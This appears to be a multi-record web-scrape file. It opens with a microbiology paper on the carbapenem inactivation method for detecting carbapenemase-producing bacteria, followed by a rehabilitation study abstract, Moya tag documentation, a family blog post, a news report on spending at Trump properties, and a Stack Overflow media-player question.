Primer name Primer sequence Product size (bp) Reference
------------- ------------------------- ------------------------------------------ -------------------------------------------------------------------
KPC_mp-F CTTGTCTCTCATGGCCGCTGG 449 this study
KPC_mp-R ACGGAACGTGGTATCGCCGAT this study
NDM_mp-F TCCTTGATCAGGCAGCCACC 591 this study
NDM_mp-R CGCATTAGCCGCTGCATTGA this study
VIM_mp-F GCMCTTCTCGCGGAGATTGA 257 this study
VIM_mp-R TGCGCAGCACCRGGATAGA this study
OXA48L-F GCTTGATCGCCCTCGATT 281 \[[@pone.0123690.ref010]\]
OXA48L-R GATTTGCTCCGTGGCCGAAA \[[@pone.0123690.ref010]\]
IMP-F GGAATAGAGTGGCTTAAYTCTC 233 \[[@pone.0123690.ref011]\]
IMP-R2 GGTTTAAYAAAACAACCACC \[[@pone.0123690.ref011]\]
23S_mp-F GCGATTTCYGAAYGGGGRAACCC 371[\*](#t004fn001){ref-type="table-fn"} \[[@pone.0123690.ref016]\]
23S_mp-R TTCGCCTTTCCCTCACGGTACT \[[@pone.0123690.ref016]\]
OXA_23-F GATCGGATTGGAGAACCAGA 501 \[[@pone.0123690.ref012]\]
OXA_23-R ATTTCTGACCGCATTTCCAT \[[@pone.0123690.ref012]\]
BIC-F TATGCAGCTCCTTTAAGGGC 537 \[[@pone.0123690.ref011]\]
BIC-R TCATTGGCGGTGCCGTACAC \[[@pone.0123690.ref011]\]
OXA48L-R2 CCCTAAACCATCCGATGTGG 516 this study
IMP-mp-F GGAATAGRGTGGCTTAATTC \[[@pone.0123690.ref017]\][\*\*](#t004fn002){ref-type="table-fn"}
IMP-mp-R1 GACTTTGGCCAAGCTTYTA 285 \[[@pone.0123690.ref017]\]
IMP-mp-R2 GTAAGCTTCAAGAGCGACG 375 \[[@pone.0123690.ref017]\]
\* product size for *E*. *coli*, size varies for different species
\*\* Zhao and Hu 2011, F and R1 primers adapted from D-F and A-R primer, respectively; R2 primer identical to C-R primer.
Next-generation sequencing {#sec006}
--------------------------
Four isolates with discrepant results for CIM in comparison to PCR, an *E*. *coli*, *K*. *pneumoniae*, *A*. *baumannii* and a *Proteus mirabilis* isolate, have been analyzed using next-generation sequencing.
DNA was extracted using the QuickExtract Bacterial DNA Extraction Kit (Epicentre, Madison, USA) according to the manufacturer's instructions, followed by proteinase K (QiaGen GmbH, Hilden, Germany) digestion and precipitation. Library preparation and sequencing of bacterial genomes was performed by BaseClear (Leiden, the Netherlands) using the Illumina Nextera XT kit and the HiSeq 2500 with a paired-end 100 cycles protocol. For detection of beta-lactamase genes, a reference list of relevant genes was composed based on those listed on the Lahey Clinic website (<http://www.lahey.org/Studies/>). Trimmed sequence reads were mapped to this reference list, after which mapped reads were extracted, assembled into contigs and antibiotic resistance determinants were identified by BLAST analysis of the resulting contigs against the same reference list. Sequence reads were deposited to the European Nucleotide Archive (ENA) under project accession PRJEB8575 (<http://www.ebi.ac.uk/ena/data/view/PRJEB8575>).
Carba NP and CarbAcineto NP {#sec007}
---------------------------
A selection of isolates has also been tested for carbapenemase activity with Carba NP and CarbAcineto NP using the most recently published protocols \[[@pone.0123690.ref018],[@pone.0123690.ref019]\]. In short, a suspension of a fourth to a third of a 10 μl loop of culture in 100 μl of commercially available lysis buffer (B-PERII, Thermo Scientific Pierce, Rockford, USA) was mixed with 100 μl of a phenol red solution of pH 7.8 containing 0.6 mg imipenem monohydrate. If a carbapenemase is present in the solution, the hydrolysis of the imipenem will lower the pH, causing the phenol red to turn from red to orange or yellow. For *Acinetobacter*, this protocol has two modifications: the use of a 5 M NaCl solution instead of the B-PERII lysis buffer and a full 10 μl loop of culture as an inoculum.
Results {#sec008}
=======
Validation of the CIM {#sec009}
---------------------
To validate the robustness of the CIM, the influence of a number of variables on the outcome of the assay was determined. First, the required density of the bacterial suspension used to immerse the meropenem disk was assessed. For this purpose, we used three isolates: two isolates yielding an OXA-48 PCR product: a *K*. *pneumoniae* with an MIC of 32 μg/ml and an *E*. *cloacae* with an MIC of 1.5 μg/ml for meropenem and *E*. *coli* ATCC 25922 as a negative control. Bacterial suspensions with optical density OD~595~ 2.6, OD~595~ 13 (density obtained with a loop full of bacteria), and OD~595~ 65 were used (OD~595~ 2.6 correlates with a McFarland value of 11.3). The suspension with OD~595~ 2.6 yielded negative results for both OXA-48 positive isolates, whereas both OD~595~ 13 and OD~595~ 65 yielded positive CIM results. The CIM remained negative for all densities of *E*. *coli* ATCC 25922.
A subset of ten isolates from the selection in [Table 1](#pone.0123690.t001){ref-type="table"} was used to determine the influence of a number of other variables. First, the incubation time of the meropenem disk in the bacterial suspension was varied from 30 minutes to overnight. Results indicated that for this subset, 30 minutes were sufficient to obtain correct results. After overnight incubation, the results could still be assessed, although decreased inhibition zones for the negative control indicated partial auto-hydrolysis of the meropenem in the disk. However, this was only tested with a small subset to illustrate the robustness of the method. To improve detection in cases of low-level carbapenemase activity and to obtain an assay that can still be interpreted within one working day, a minimum incubation time of 2 hours was chosen. Incubation temperatures of 30°C, 35°C and 37°C all yielded identical results. Suspensions made from isolates grown on Mueller-Hinton agar and Columbia sheep blood agar plates both resulted in the correct detection of carbapenemase activity. However, in cultures grown on Oxoid CRE plates (Oxoid Ltd, Hampshire, United Kingdom), which contain a chromogenic substrate and a carbapenem, carbapenemase activity could not be detected in four out of nine carbapenemase positive isolates. Suspensions made from cultures that had been maintained refrigerated on agar plates for up to two weeks gave identical results as suspensions made from fresh cultures. Similarly, bacterial suspensions made from fresh cultures that were subsequently stored for up to two weeks at 4°C, retained their capability to inactivate the carbapenem in the disk. The CIM was performed using susceptibility-testing disks containing 10 μg meropenem from two different suppliers (Oxoid Ltd, Hampshire, United Kingdom and Mast Group Ltd, Merseyside, United Kingdom), which yielded identical results. The addition of zinc sulfate to the suspension, used to stimulate metallo-betalactamases such as NDM, was tested but no beneficial effect could be demonstrated. Finally, to assess the influence of human skill on the performance of the CIM, different laboratory staff tested the previously mentioned selection of 30 Gram-negative isolates ([Table 1](#pone.0123690.t001){ref-type="table"}) and no discrepancies were found.
Application of the CIM on surveillance isolates {#sec010}
-----------------------------------------------
Of the 283 *Enterobacteriaceae* included in the study, 70 (24.7%) were shown to carry a carbapenemase encoding gene by PCR and all PCR-positives (100%) were shown to produce carbapenemase by the CIM ([Table 2](#pone.0123690.t002){ref-type="table"}). A *Proteus mirabilis* isolate with an MIC of 0.094 μg/ml for meropenem yielded a VIM PCR product, but was initially negative for CIM. Like all isolates for which PCR and CIM yielded discrepant results, the analysis was repeated and CIM was positive in the second analysis. Two other isolates with MICs ≤ 0.25 μg/ml (*K*. *pneumoniae* and *E*. *coli*) yielded an OXA-48 PCR product and both isolates were shown to produce carbapenemase. Three isolates (two *K*. *pneumoniae* and one *E*. *coli*) produced carbapenemase, but were PCR-negative using our multiplex PCR. However, they did yield an OXA-48-like PCR product using a modified reverse primer (OXA-48L-R2, [Table 4](#pone.0123690.t004){ref-type="table"}). Sanger sequencing of the PCR product obtained with this modified primer revealed that all three had allele OXA-181, which cannot be detected with the original primer set. Nearly half of the *K*. *pneumoniae* (47.7%) and *E*. *coli* (48.8%) isolates included in this study yielded a PCR product representing a carbapenemase encoding gene and all these isolates were CIM-positive. However, we detected a carbapenemase encoding gene in only a minor fraction of the *E*. *cloacae* (5.6%) and the other *Enterobacteriaceae* (3.8%). Again, all PCR-positives were shown to produce carbapenemase by CIM. Of the 26 OXA-48 positive *K*. *pneumoniae* isolates, five had a mucoid colony morphology, but this did not affect the ability of CIM to detect carbapenemase activity. Forty *Enterobacteriaceae* isolates (14.1%) had MICs for meropenem that were above the EUCAST clinical breakpoint of resistance (\>8 μg/ml). In 14 of these (35.0%) no carbapenemase encoding gene or carbapenemase activity was detected.
The collection contained a large number of non-fermenting Gram-negatives all belonging to the *Pseudomonas* and *Acinetobacter* genera ([Table 3](#pone.0123690.t003){ref-type="table"}). Sixty-seven of the 411 isolates (16.3%) yielded a PCR product and 65 of these samples (97.0%) yielded a positive CIM. Only in two *A*. *baumannii* isolates carrying *bla* ~OXA-23~, carbapenemase activity could not be detected with CIM. All 67 isolates had MICs \>0.25 μg/ml. Among the *Pseudomonas* isolates, VIM was the most frequently detected carbapenemase encoding gene, present in 49 of the 387 isolates (12.7%). In *A*. *baumannii*, OXA-23 was the predominant carbapenemase encoding gene, detected in 12 of the 18 isolates (66.7%). None of the other *A*. spp. were PCR positive. Of the 344 PCR-negative non-fermenter isolates, only seven were CIM-positive (2.0%) and all of these isolates had MICs \>0.25 μg/ml. Three of these isolates were found to contain a carbapenemase-encoding gene using additional PCRs; two *Pseudomonas* isolates were BIC positive \[[@pone.0123690.ref011]\] and one *Pseudomonas* isolate was found to carry an IMP variant not detected by our multiplex PCR) \[[@pone.0123690.ref017]\]. In addition, one CIM-positive *A*. *baumannii* isolate was found to contain an OXA-72 gene by next-generation sequencing. Compared to the *Enterobacteriaceae*, a larger portion of the non-fermenter isolates had MICs for meropenem that were above the EUCAST clinical breakpoint for resistance (222/411, 54.0%). Yet, 164 (73.8%) of these were negative in both PCR and CIM.
Comparison of CIM with Carba NP {#sec011}
-------------------------------
A selection (n = 116) of the isolates subjected to CIM has also been tested with Carba NP or CarbAcineto NP using the most recently published protocols \[[@pone.0123690.ref018],[@pone.0123690.ref019]\]. These isolates include all isolates used for validation ([Table 1](#pone.0123690.t001){ref-type="table"}), all OXA-48 positive *K*. *pneumoniae* isolates as well as all CIM/PCR discrepant isolates, supplemented with a random selection of other isolates used ([Table 5](#pone.0123690.t005){ref-type="table"}). Four isolates (3.4%) gave different results for CIM than for Carba NP. Three of these were isolates found to contain a carbapenemase encoding gene (two *bla* ~BIC~ and one *bla* ~OXA-48like~) where CIM was positive and Carba NP was (false-) negative. The fourth isolate was a CIM positive *Pseudomonas* spp. for which no carbapenemase encoding gene was identified, but carbapenemase activity could not be confirmed with Carba NP.
10.1371/journal.pone.0123690.t005
###### Comparison of the CIM and Carba NP test.
{#pone.0123690.t005g}
Species PCR n CIM+ CarbaNP+
-------------------------------- -------- ---- ------ ----------
*Klebsiella pneumoniae*(38) KPC 1 1 1
NDM 5 5 5
OXA-48 28 28 28
IMP 2 2 2
neg 2 0 0
*Escherichia coli* (8) NDM 1 1 1
OXA-48 3 3 2
neg 4 0 0
*Enterobacter cloacae* (7) OXA-48 2 2 2
VIM 1 1 1
neg 4 0 0
Other *Enterobacteriaceae*(16) NDM 1 1 1
VIM 1 1 1
neg 14 0 0
*Pseudomonas aeruginosa*(5) VIM 3 3 3
IMP 1 1 1
neg 1 0 0
*Pseudomonas* spp. (8) VIM 1 1 1
IMP 1 1 1
BIC 2 2 1
neg 4 2 1
*Acinetobacter baumannii*(3) OXA-23 2 0 0
OXA-72 1 1 1
*Acinetobacter* spp. (1) neg 1 0 0
All isolates 86 54 51
Discussion {#sec012}
==========
The concept of demonstrating enzymatic hydrolysis of beta-lactam antibiotics by incubating them with bacterial suspensions is not new and dates back to the late 70s \[[@pone.0123690.ref020]\]. However, the CIM is the first to use antibiotic susceptibility-testing disks, which are globally available at low cost and have long shelf lives, as substrate aliquots for this. This greatly improves practicality and reduces costs and labor. Furthermore, this method was shown to be unaffected by changes in variables such as incubation temperature or time, disk manufacturer, laboratory staff and the age of the culture or bacterial suspension making it a cost-effective and highly robust phenotypic screening method that can reliably detect carbapenemase activity. As it requires no specialized equipment, reagents or skill and low hands-on time to perform, it is a high throughput method enabling screening of large numbers of isolates in most medical microbiological laboratories.
The application of the CIM in this study shows that it is capable of detecting carbapenemase production in Gram-negatives allowing distinction between carbapenem-resistance due to beta-lactamase activity and reduced permeability. There was a high concordance (100% for *Enterobacteriaceae* and 98,8% for non-fermenters) between PCRs that detect carbapenem encoding genes and carbapenemase activity detected by CIM. After application of additional PCRs to the discrepant isolates, all findings with CIM were in accordance with PCRs among *Enterobacteriaceae*, giving CIM a positive predictive value and a negative predictive value of 100% for *Enterobacteriaceae* compared to PCRs. One *P*. *mirabilis* isolate showed a remarkable result: it carried a *bla* ~VIM-1~ gene, but had a low MIC for meropenem (0.094) and initially yielded a negative CIM. However, when repeated CIM was positive. Carba NP showed a weak positive reaction for this isolate. Preliminary results obtained by next-generation sequence analysis of this isolate strain showed that the bla~VIM-1~ gene itself was intact and located on a class I integron-like structure as has been described for other VIM-producing species, such as *P*. *aeruginosa*, *K*. *pneumoniae* and another *P*. *mirabilis* isolate \[[@pone.0123690.ref021]--[@pone.0123690.ref023]\]. Expression of resistance cassettes from integron 1-type structures is mediated by the P~ant~ promoter. Variations in P~ant~ promoter sequence have been observed in several naturally occurring integrons, and have been shown to differ at least 20-fold in strength \[[@pone.0123690.ref024]\], with the promoter sequence found in our *P*. *mirabilis* isolate (TGGACA-N17-TAAGCT) belonging to the weaker promoters. Weak expression of *bla* ~VIM-1~ would result in low-level carbapenemase activity around the detection-threshold of CIM, explaining the discrepancy between the two assays performed with this isolate as well as the low MIC observed.
Initially, there were seven isolates among the non-fermenters that were CIM-positive, but for which no gene could be identified using the multiplex PCR. After applying additional PCRs, four isolates remained PCR-negative, one of which could be explained by an OXA-72 gene identified using next-generation sequencing. Of the remaining three false-positive isolates, two were also Carba NP positive, suggesting the presence of a carbapenemase currently undetectable by our genotypic methods. Conversely, for two OXA-23 positive *A*. *baumannii* isolates no phenotypic carbapenemase activity could be detected using CIM. When CIM was performed using an extended incubation time of four hours instead of two, CIM was positive for both *Acinetobacter* isolates, indicating very weak carbapenemase activity. Carbapenemase activity could also not be detected for these isolates using CarbAcineto NP ([Table 5](#pone.0123690.t005){ref-type="table"}). The difficulties detecting low-level carbapenemase activity among both these *A*. *baumannii* isolates and the *P*. *mirabilis* isolate mentioned earlier can be regarded as a limitation of the CIM. Use of an extended incubation time of four hours for all *Acinetobacter* and *Proteus* isolates might overcome this limitation, but further research is required to determine if this will improve detection without compromising specificity. The five discrepant non-fermenter isolates are considered false-positive and false-negative. This leads to a positive predictive value of 96.3% and a negative predictive value of 99.4% for CIM among non-fermenters compared to PCRs.
Additionally, many isolates apparently were resistant for meropenem, but were negative in both PCR and CIM, suggesting that carbapenem-resistance was mediated by other mechanisms than carbapenemase activity in these isolates, which is currently being investigated by next-generation sequencing.
In comparison to the Carba NP method \[[@pone.0123690.ref013],[@pone.0123690.ref014],[@pone.0123690.ref018],[@pone.0123690.ref019]\], CIM has similar high performance (96.6% concordance, 112/116), but significantly lower cost (€0.60 compared to €13 in our setting). Prices mentioned are based on imipenem and B-PERII buffer as reagents for CarbaNP and a meropenem disk, Mueller-Hinton agar plate and sterile cotton swab required for CIM. In addition, we believe that CIM is even easier to perform than Carba NP since there is no need to prepare a fresh pH adjusted imipenem solution for each test. Moreover, in our experience, interpretation of results using CIM is also much easier compared to the Carba NP test. Some of the isolates tested with Carba NP showed a very weak color change that could easily have been missed in a routine screening setting. However, we should emphasize that this study was not intended to compare CIM with Carba NP.
Another alternative to detect carbapenemase activity among isolates is an assay based on matrix-assisted laser desorption ionization time-of-flight mass spectrometry (MALDI-TOF MS). High performance has been reported for this technique, but none of these studies feature strain collections as large as the one described here \[[@pone.0123690.ref025]--[@pone.0123690.ref028]\]. Furthermore, this technique requires expensive specialized equipment, which may not be present in all medical microbiological laboratories, making it less suited for screening purposes.
The CIM concept has the potential to also be applied to assess enzymatic hydrolysis of other antibiotics, e.g. allowing detection of ESBL activity. Preliminary experiments in our laboratory have shown this may be feasible. This will need to be further investigated, but it could represent an additional advantage over Carba NP, which can only be applied to antibiotics that generate sufficient acidity upon hydrolysis.
In conclusion, we have shown that the CIM provides a low cost alternative for the Carba NP test. It allows easy and rapid identification of carbapenemase activity. This provides a tool to identify carbapenem-resistant Gram-negative bacteria that may easily spread in health care settings.
The authors would like to express their gratitude to Edwin van Zadelhoff for practical assistance to this study.
[^1]: **Competing Interests:**The authors have declared that no competing interests exist.
[^2]: Conceived and designed the experiments: KvdZ GNP AJdN LMS. Performed the experiments: KvdZ AdH. Analyzed the data: KvdZ HJB LMS. Wrote the paper: KvdZ AdH GNP HJB AJdN LMS.
| 2023-08-22T01:27:15.642919 | https://example.com/article/9149 |
In-hospital short-term training program for patients with chronic airway obstruction.
To compare the functional benefits and relative costs of administering an intense short-term inpatient vs a longer outpatient pulmonary rehabilitation program (PRP) for patients with chronic airway obstruction (CAO). Retrospective case-control study. Pulmonary ward and outpatient clinic of a rehabilitation center. Forty-three patients (case subjects) selected on the basis of selection criteria were compared with control subjects matched to them for age, sex, FEV(1), and diagnosis of either COPD or asthma. Case subjects performed 10 to 12 daily sessions (5 sessions a week) of inpatient PRP; control subjects performed 20 to 24 sessions (3 sessions a week) of outpatient PRP. At baseline and after the PRP, an incremental exercise test was performed, including evaluation of dyspnea and leg fatigue by Borg scale (D and F, respectively) at each workload step. The cost of PRP was also evaluated. Both PRPs resulted in similar significant improvements in cycloergometry peak workload (from 68 +/- 18 to 82 +/- 22 and from 75 +/- 17 to 87 +/- 27 W in case subjects and control subjects, respectively), isoload D (from 6.4 +/- 1.6 to 4.2 +/- 1.8 for case subjects and from 8.5 +/- 1.9 to 6.3 +/- 2.4 for control subjects) and isoload F (from 6.6 +/- 1.8 to 4.2 +/- 1.8 for case subjects and from 8.9 +/- 1.9 to 7.0 +/- 1.8 for control subjects). Although the single daily session was less expensive, the outpatient PRP total costs were greater because of the higher number of sessions and the cost of daily transportation. In patients with CAO, a shorter inpatient PRP may result in improvement in exercise tolerance similar to a longer outpatient PRP but with lower costs. Whether a shorter outpatient PRP may get physiologic and clinical benefits, while further reducing costs, must be evaluated by future controlled, randomized, prospective studies. | 2023-09-08T01:27:15.642919 | https://example.com/article/6981 |
{
"name": "rewrite-to",
"doc_namespace": "xmlns.http://moyaproject.com",
"doc_class": "tag",
"references": [
"doc.index",
"tags.index"
],
"data": {
"name": "rewrite-to",
"lib": null,
"namespace_slug": "moyaproject_dot_com",
"defined": "/home/will/projects/moya/moya/tags/response.py",
"doc": "\nThis tag tells Moya to serve the content from a different URL.\n\nNote, that unlike [tag]redirect-to[/tag], this does not involve an extra request.\n\n",
"namespace": "http://moyaproject.com",
"synopsis": "serve response from a different location",
"tag_name": "rewrite-to",
"params": {
"fragment": {
"default_display": "",
"name": "fragment",
"missing": true,
"default": null,
"doc": "Fragment component in url",
"required": false,
"type": "text",
"metavar": null,
"empty": true,
"choices": null
},
"path": {
"default_display": "",
"name": "path",
"missing": true,
"default": null,
"doc": "New path portion of the url, may be relative",
"required": false,
"type": "text",
"metavar": "PATH",
"empty": true,
"choices": null
},
"url": {
"default_display": "",
"name": "url",
"missing": true,
"default": null,
"doc": "Destination URL",
"required": false,
"type": "text",
"metavar": "URL",
"empty": true,
"choices": null
},
"query": {
"default_display": "None",
"name": "query",
"missing": true,
"default": null,
"doc": "Mapping expression to use as a query string",
"required": false,
"type": "expression",
"metavar": "EXPRESSION",
"empty": true,
"choices": null
}
},
"example": null,
"inherited_params": {
"if": {
"default_display": "yes",
"name": "if",
"missing": true,
"default": true,
"doc": "Conditional expression",
"required": false,
"type": "expression",
"metavar": null,
"empty": true,
"choices": null
}
}
},
"id": "xmlns.http://moyaproject.com.rewrite-to"
} | 2024-02-05T01:27:15.642919 | https://example.com/article/5561 |
Though each woman is unique in her character and experiences we can both learn from her and offer her true empathy as only women and sisters can do.
Monday, October 12, 2009
Brandy's Day
My Day 10/02/09
My day started slow. No school for the kids, breakfast, laundry. Only my three kids. Not that they're "only's" but it was just us. [Editor's note: Brandy is awesome and usually tends her friend's or sister's kids too.]
Grams was 'kidnapping' the boys that afternoon to roast hot dogs and marshmallows. So, I was trying to secretly get some things together for them, along with another set of hats gloves and jackets that could be non-smokey to take to the BYU game that evening. I followed Grams up Big Cottonwood canyon (she had the boys) and it was, unexpectedly, good weather. We had a lot of fun, hot dogs are always the best over a fire.
We left just in time to get back home, and quickly showered while Karl took our baby girl to my mom's house for the evening. Now the next part may be confusing, sorry....Shane, my brother, took his daughter, and our boys to the Campbells (my sisters), where we would all meet up and go to the game.
Karl and I followed a few minutes later. As we were on our way a car crossed the road in front of us on Bacchus highway. We missed the bronco but did not miss a cement barrier. I let out several really weird "eeeee!'s". I remember what they sounded like, and it did not sound like me. But I was scared. In those two seconds so many thoughts went through my head. "Don't hit the car," along with what could happen. "We missed.", "No! Don't hit that!", "We're up in the air, this is what it's like to roll in a car!" We didn't roll, but my side was up along the barriers for several feet.
When it was done, Karl and I were both okay, just a little sore for a few days. We are so blessed. Was my necklace lucky? Possible. But was it good or bad luck? Good thing I don't believe in luck. But we were blessed. Karl says we must have had angels guarding us.
Some call me crazy, but we had tickets and our baby was with my mom, so we continued on to the the game. We even made it there with a few minutes left in the 2nd quarter. It was a good game, not the most exciting to watch. Of course, I don't usually get real excited about football. But we had fun and BYU won.
It was a long trip home. We weren't sure if we'd get out of the parking lot, or run out of gas first, but we made it out. When we were all home together, all safe and sound, it felt so good. It was a great day. I was, and am, grateful we were all safe.
What is Five Necklaces?
Think of it as a sociological experiment: How many women can we learn about? Will we be inspired by them? Will they make us laugh? Or will we just sympathize with the monotony of their day?
I gave my four sisters and my mom a necklace and told them how much I admired them. I then requested that they wear the necklace only once then tell me about their experiences or what they did while wearing it. Then they were to pass it on to someone else they admire...and so on.
Blog Archive
Frequently Asked Questions
What is Five Necklaces?Five Necklaces is a website that tracks the journey of five necklaces from woman to woman and friend to friend.
Why did I get this necklace?You were given this necklace because you are an awesome woman. To find out what your friend said about you just browse the blog to find your name, the necklace you were given will be listed at the bottom of the post (just in case of duplicates).
What do I do with my necklace?You wear it of course…but only once. You can save it for a special occasion, or just wear it while you schlep around the house on the weekend. The choice is yours. After you’ve worn it then email fivenecklaces@yahoo.com and share your experience, like others before you have done. Pictures are always welcome. What you email will be posted here for you.
Now what?Now you pass this necklace onto another woman who you admire. Please email and tell us why you selected this person. If you don’t want to participate in the project, then email fivenecklaces@yahoo.com and arrangements will be made to forward the necklace to someone else.
I lost the letter that goes with the necklace.Just email fivenecklaces@yahoo.com and another will be emailed to you. | 2023-12-01T01:27:15.642919 | https://example.com/article/5684 |
It would be his 126th visit to one of his properties since taking office. And this visit — like more than a dozen before it — would bring paying customers, allowing Trump to play a double role.
The president would be the headliner and the caterer.
AD
Trump has bigger designs for the Doral club: He has suggested holding next year’s Group of Seven meeting — a gathering of world leaders — at Doral or another of his luxury resorts, current and former White House staffers said.
AD
Since taking office, Trump has faced pushback about his official visits to his properties from some of his aides, including inside the White House Counsel’s Office. They worried about the appearance that he was using the power of the presidency to direct taxpayer money into his own pockets, according to current and former White House officials, who spoke on the condition of anonymity to discuss private conversations.
Trump has rebuffed such warnings, overruling a recommendation that he not visit his Turnberry golf club in Scotland last summer, according to aides. And in recent months, he has scheduled even more detours from official trips to visit his businesses — golf courses in Ireland, Los Angeles and Doral.
AD
In all, his scores of trips have brought his private businesses at least $1.6 million in revenue, from federal officials and GOP campaigns who pay to go where Trump goes, according to a Washington Post analysis.
They gave Trump valuable marketing opportunities — to showcase his opulent properties on an international stage.
Trump’s preference for his own properties also has reshaped the GOP fundraising schedule, with benefits for the Trump Organization.
AD
About one-third of all the political fundraisers or donor meetings that Trump has attended — 23 out of 63 — have taken place at his own properties, according to the Post analysis of federal campaign finance records and the president’s public schedule. Campaign finance records show several Republican groups paying to hold events where Trump spoke. GOP fundraisers say they do that, in part, to increase the chances Trump will attend.
AD
It has also reshaped the spending habits of the federal government, turning the president into a vendor.
“The president knows that by visiting his properties, taxpayer dollars will flow directly into his own pockets. Then, unsurprisingly, the president visits his properties all the time,” said Ryan Shapiro, the executive director of a watchdog group called Property of the People. That group obtained extensive records on federal spending at Trump properties, via public-records requests and lawsuits, that it shared with The Post.
AD
The White House did not respond to requests for comment. Trump still owns his businesses, although he says he has given day-to-day control to his sons Donald Trump Jr. and Eric.
AD
Federal spending at Trump’s properties has drawn scrutiny from the attorneys general in Maryland and the District of Columbia. They have sued Trump for allegedly violating the Constitution’s prohibition against presidents receiving extra gifts or payments — known as emoluments — from the federal government outside the presidential salary. They have also accused Trump of violating a constitutional ban on “emoluments” from foreign governments, by doing business with them at his D.C. hotel. The case is pending.
And this week, the House passed an amendment banning the State Department from spending money at Trump-branded properties.
“It’s against the emoluments clause of the Constitution to be making money out of the job,” said the amendment’s sponsor, Rep. Steve Cohen (D-Tenn.) “And he does it every chance he can.”
The Trump Organization did not respond to requests for comment. George Sorial, a former ethics adviser to the company, said Trump’s properties do not seek to make a profit from government customers but charge them the cost of their stays.
AD
AD
And in interviews, political customers say their attendees love patronizing the Trump brand.
To estimate the revenue produced by Trump’s visits to his properties, The Post reviewed public records about federal spending and campaign spending at Trump’s properties — then compared those records to Trump’s publicly available travel schedule.
The Post sought to identify any spending that seemed triggered by Trump’s visit — payments by federal officials who accompanied him, payments by campaign committees for events at which Trump spoke.
The actual amount of money Trump has received as a result of his visits and campaign events is probably much higher than the $1.6 million The Post identified. That’s because most of the records available about government spending date to the first half of 2017 — covering just the first few months of Trump’s presidency so far. And the records of campaign spending don’t account for other revenue that Trump may have made off campaign events, including overnight stays by donors attending the event.
These records show that Trump began receiving payments from his own government in February 2017, when he made his first presidential visit to his Mar-a-
Lago Club in Palm Beach, Fla.
AD
AD
The Defense Department paid $12,000 for rooms at the club, according to invoices, emails and other records obtained by Property of the People.
In April 2017, Trump returned again to Mar-a-Lago — where he hosted Chinese President Xi Jinping. Over those four days, the government paid Trump’s club at least $30,000 on meeting rooms and hotel lodgings for then-Secretary of State Rex Tillerson and other VIPs in suites and beachfront cabanas, the documents show.
Tillerson got the Adam Suite, touted for its “double sized Jacuzzi tub.” Then-Deputy Chief of Staff Joe Hagin was assigned to the “Banyan Bungalow,” which includes a private meditation garden, according to a State Department manifest.
AD
“Do you know what they charged for each room?” one State Department official asked Michael Dobbs, a State Department travel coordinator in an email obtained by Property of the People. The Post could not reach Dobbs for comment.
“$546 — I believe which is 300% of the lodging per diem,” Dobbs wrote back — meaning it was three times the standard allowance for federal travelers in that part of Florida. There are some exceptions, but 300 percent is the maximum amount that the government will reimburse any traveler for lodging.
Also, as first reported by ProPublica, the government was sent a $1,000 bill rung up by Trump aides at one of the club’s bars.
AD
AD
“They asked the bartender to leave so they could speak confidentially, and the Secret Service did not allow the bartender to enter the room again,” the club’s catering director wrote. “The group served themselves.”
In all, The Post found $145,000 in government payments to three Trump businesses — Mar-a-Lago; a golf club in Bedminster, N.J.; and the golf resort in Turnberry — that appeared connected to Trump’s visits.
The State Department and the White House did not answer questions about how much more federal money had been paid to Trump’s clubs.
Within the White House, ethics officials sometimes sought to dissuade Trump from making side trips to his courses or holding public presidential events there. But in some cases, Trump did it anyway, former White House aides said. He stopped to visit his Waikiki hotel during a Hawaii layover in 2017, on his way to Asia. He stopped in Turnberry.
Earlier this month, Trump also inserted a three-day detour to his golf club in Ireland between official trips to the United Kingdom and France — taking Trump and his aides hundreds of miles out of the way.
AD
“We’re going to be staying at Doonbeg in Ireland because it’s convenient and it’s a great place. But it’s convenient,” Trump said then. While in Ireland, he also met with Prime Minister Leo Varadkar.
His ethics officials have also sought to dissuade his subordinates. Stefan Passantino, a former White House lawyer, tried to bar any Cabinet or White House official from appearing at a Trump property in their official capacity, according to former White House officials.
Sorial, the Trump Organization’s former compliance counsel who served as the company’s in-house ethics adviser until this year, in an interview rejected the idea that Trump was turning a profit off business with his own government.
“It generates nothing. We charge domestic government entities our costs,” Sorial said. Last year, for instance, Trump spent two days at his Turnberry golf course in the middle of an official trip to Europe. Sorial said the hotel charged the government only $175 per room, a huge discount from the normal rate of $500 or more.
AD
“I assure you,” he said. “It’s not business we want.”
Sorial did not provide any statistics on the total revenue from government entities.
Federal Election Commission records paint a more detailed picture of political spending at Trump properties, showing about $1.2 million paid by GOP-linked committees for events like the one on Wednesday — where Trump was the guest of honor, and also the guy who owned the room.
Republican officials say Trump has not told them to hold events at his properties.
But, after a while, he didn’t have to.
They saw how much time he spent at his own properties — and decided to go where the president liked to be.
In addition, GOP fundraisers said, Trump hotels are used to the logistics of presidential events, are luxurious and can even be cheaper than competitors.
The Trump Organization’s properties are “world-class venues in destination locations that our supporters want to visit and are excited to attend events at,” said Brian O. Walsh, president of a pro-Trump committee — America First Action PAC — that has spent $427,000 on events at Trump properties. “The staff is always respectful, professional and provides best-in-class service.”
So far, GOP fundraisers say, donors aren’t concerned that some of their money winds up spent at the president’s private business.
They’re thrilled.
“The Trump hotel in Washington is the best hotel in D.C.,” said Roy Bailey, GOP donor and fundraiser for Trump’s 2020 reelection. “It’s got all the ample space and it’s got the president’s name on it, it’s fantastic. It’s a huge draw for people who want to support the president.”
Doug Deason, another prominent Trump donor, explained one reason: Visiting Trump’s hotel often means hobnobbing with officials in Trump’s government, who treat the lobby as a friendly hangout. He said he recently saw White House counselor Kellyanne Conway there and Attorney General William P. Barr, who was having dinner and taking pictures with customers.
“Donors, when they come to town now, they want to go to the hotel. They think it’s the place to be,” said Sean Spicer, an adviser to America First Action and former White House press secretary.
This week’s fundraiser took place at Doral — a resort that Trump bought in 2012 that is now “severely underperforming” its competitors, according to testimony that Trump’s representative gave in a county tax dispute last year.
Trump stayed overnight at the resort Tuesday, then attended Wednesday’s fundraiser — which attracted about 100 donors and raised $6 million, according to a person familiar with the event, who spoke on the condition of anonymity because the person was not authorized to speak publicly. The event was closed to the public. | 2023-11-13T01:27:15.642919 | https://example.com/article/9286 |
Q:
how can I play the songs one after another in windows media player
I'm developing a VS 2008 C# coded Windows media player using axWindows media player control available in Visual Studio. I have stored the song paths in a SQL server 2005 database and I'm able to play one song at a time now. I want my application to play the songs from the database continuously without asking anything. How can I achieve this task , please suggest me the way to do so.
A:
You can either pass in the song list as a whole playlist, or you may want to use the PlayStateChange event to listen for when the current song ends and then load up the next song when that happens.
| 2024-05-11T01:27:15.642919 | https://example.com/article/7046 |
Boxed Gifts Promo Codes May 2018
